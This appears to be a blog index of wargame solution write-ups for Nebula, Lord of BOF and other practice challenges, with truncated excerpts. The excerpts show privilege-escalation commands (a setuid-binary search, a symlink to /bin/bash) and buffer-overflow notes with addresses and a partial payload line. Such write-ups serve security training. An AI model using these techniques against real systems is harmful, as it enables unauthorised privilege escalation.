
Wargames

[Pwnable.kr] Toddler's Bottle Solutions - 20/20 This post is protected.
[Exploit-Exercise] Nebula Solutions
Solutions
Level 00
level00@nebula:~$ find / -perm -4000 -user flag00 2>/dev/null
/bin/.../flag00
/rofs/bin/.../flag00
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account
Level 01
level01@nebula:/home/flag01$ ln -s /bin/bash /tmp/a
level01@nebula:/home/flag01$ echo -e '#!/bin/bash..
[Reversing.kr] Music Player This post is protected.
[Lord Of Bof] Lord Of BOF Solutions ( Fedora 10 )
Solutions
Level 1 - off-by-one %ecx register overflow
; first we know about environment of Fedora 5
; prologue and epilogue are changed
; by ecx register, it works as stack guard and stack shield
; normally we can't control ret address directly, but for controlling ret address, we need to know ecx(ret+4)
; but it's extremely difficult to guess %ecx register because of ASLR
; SO we need to use of..
[Lord Of Bof] Lord Of BOF Solutions ( Fedora 4 )
Solutions
Level 1 - up-upgraded simple buffer overflow
; no more fake ebp
; random library
; like FC3 level1 prob, use ret to ret for escaping random stack
; when using 12 ret, execve's argv of 2 is null
; ret address : 0x08048451
; execve address : 0x00832abc
; for file name : 85 c0 75 53 65 a1 54
; payload : ln -s ./shell $(echo -en "\x85\xc0\x75\x53\x65\xa1\x54") ./cruel $(python -c 'print "A..